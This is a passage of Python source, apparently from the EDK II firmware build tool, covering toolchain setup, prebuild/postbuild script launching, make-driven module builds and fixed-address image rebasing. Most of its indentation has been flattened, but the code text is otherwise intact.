EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
self.GetToolChainAndFamilyFromDsc (self.PlatformFile)
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append(TAB_COMPILER_MSFT)
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
self.ThreadNumber = ThreadNum()
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db_Flag = True
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
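    # Illustrative sketch (hypothetical values): a platform PREBUILD entry such as
    #   PREBUILD = MyPlatformPkg/PreBuild.py -flag
    # keeps '-flag' untouched, resolves 'MyPlatformPkg/PreBuild.py' to an absolute
    # path when that file exists under the workspace, and then appends the
    # pass-through string built by PassCommandOption() (the original command words
    # plus any -b/-a/-t/-p values not given on the command line and the --conf
    # directory).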
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db.MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
                BuildStr += ' -p ' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
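    # Illustrative sketch (hypothetical values): with none of the options given on
    # the command line, PassCommandOption(('DEBUG',), ('X64',), ('GCC5',),
    # 'MyPkg/My.dsc', 'all') would return something like
    #   ' -b DEBUG -a X64 -t GCC5 -p MyPkg/My.dsc --conf=<gConfDirectory> all'
    # prefixed by any original command words kept in GlobalData.gCommand.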
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
            # The purpose of the .PrebuildEnv file is to capture environment variable settings
            # made by the prebuild script and preserve them for the rest of the main build step;
            # the child process environment evaporates as soon as the process exits, so it cannot
            # be read directly during the build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
            if Process.returncode != 0:
                EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process was not successful!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
            if Process.returncode != 0:
                EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process was not successful!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
    # Create autogen code and makefile for a module or platform, and then launch the
# "make" command to build it
#
    # @param  Target              The target of the build command
    # @param  AutoGenObject       The platform or module AutoGen object to build
    # @param  CreateDepsCodeFile  Flag used to indicate creating code for
    #                             dependent modules/Libraries
    # @param  CreateDepsMakeFile  Flag used to indicate creating makefile for
    #                             dependent modules/Libraries
    # @param  BuildModule         Flag used to indicate a single-module build
    # @param  FfsCommand          Optional dict of FFS commands keyed by (INF path, Arch)
    # @param  PcdMaList           Optional list of ModuleAutoGen objects for PCD driver modules
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand=None, PcdMaList=None):
if AutoGenObject is None:
return False
if FfsCommand is None:
FfsCommand = {}
        # skip file generation for the cleanxxx, run, and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
mqueue = mp.Queue()
for m in AutoGenObject.GetAllModuleInfo:
mqueue.put(m)
mqueue.put((None,None,None,None,None,None,None))
AutoGenObject.DataPipe.DataContainer = {"CommandTarget": self.Target}
AutoGenObject.DataPipe.DataContainer = {"Workspace_timestamp": AutoGenObject.Workspace._SrcTimeStamp}
AutoGenObject.CreateLibModuelDirs()
AutoGenObject.DataPipe.DataContainer = {"LibraryBuildDirectoryList":AutoGenObject.LibraryBuildDirectoryList}
AutoGenObject.DataPipe.DataContainer = {"ModuleBuildDirectoryList":AutoGenObject.ModuleBuildDirectoryList}
AutoGenObject.DataPipe.DataContainer = {"FdsCommandDict": AutoGenObject.Workspace.GenFdsCommandDict}
self.Progress.Start("Generating makefile and code")
data_pipe_file = os.path.join(AutoGenObject.BuildDir, "GlobalVar_%s_%s.bin" % (str(AutoGenObject.Guid),AutoGenObject.Arch))
AutoGenObject.DataPipe.dump(data_pipe_file)
cqueue = mp.Queue()
autogen_rt,errorcode = self.StartAutoGen(mqueue, AutoGenObject.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
with open(AutoGenIdFile,"w") as fw:
fw.write("Arch=%s\n" % "|".join((AutoGenObject.Workspace.ArchList)))
fw.write("BuildDir=%s\n" % AutoGenObject.Workspace.BuildDir)
fw.write("PlatformGuid=%s\n" % str(AutoGenObject.Guid))
self.Progress.Stop("done!")
if not autogen_rt:
self.AutoGenMgr.TerminateWorkers()
self.AutoGenMgr.join(1)
raise FatalError(errorcode)
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(True)
AutoGenObject.CreateMakeFile(True)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# run
if Target == 'run':
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# build library
if Target == 'libraries':
DirList = []
for Lib in AutoGenObject.LibraryAutoGenList:
if not Lib.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
for Lib, LibAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
return True
# build module
if Target == 'modules':
DirList = []
for Lib in AutoGenObject.LibraryAutoGenList:
if not Lib.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
for Lib, LibAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
DirList = []
for ModuleAutoGen in AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, ModuleAutoGen.BuildDir),ModuleAutoGen))
for Mod,ModAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,ModAutoGen)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, self.MakeFileName))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
    # Create autogen code and makefile for a module or platform, and then launch the
# "make" command to build it
#
    # @param  Target              The target of the build command
    # @param  AutoGenObject       The platform or module AutoGen object to build
    # @param  CreateDepsCodeFile  Flag used to indicate creating code for
    #                             dependent modules/Libraries
    # @param  CreateDepsMakeFile  Flag used to indicate creating makefile for
    #                             dependent modules/Libraries
    # @param  BuildModule         Flag used to indicate a single-module build
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
        # skip file generation for the cleanxxx, run, and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(True)
AutoGenObject.CreateMakeFile(True)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
Threshold = self.GetFreeSizeThreshold()
if Threshold:
self.CheckFreeSizeThreshold(Threshold, AutoGenObject.FvDir)
return True
# run
if Target == 'run':
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
            # Add GUID and general section information.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
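    # Illustrative sketch (hypothetical module and numbers): for a non-SMM module
    # of size 0x3000 with BaseAddress 0x7FFF0000 on entry, the image is rebased to
    # 0x7FFED000 (BaseAddress - Image.Size) and entries roughly like
    #   MyDriver (Fixed Memory Address, BaseAddress=0x007FFED000, EntryPoint=...)
    #   (GUID=..., .textbaseaddress=..., .databaseaddress=...)
    #   (IMAGE=.../DEBUG/MyDriver.efi)
    # are appended to MapBuffer, followed by one line per function found in the
    # linker map file.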
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
                # skip the FV size information (first four header lines)
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
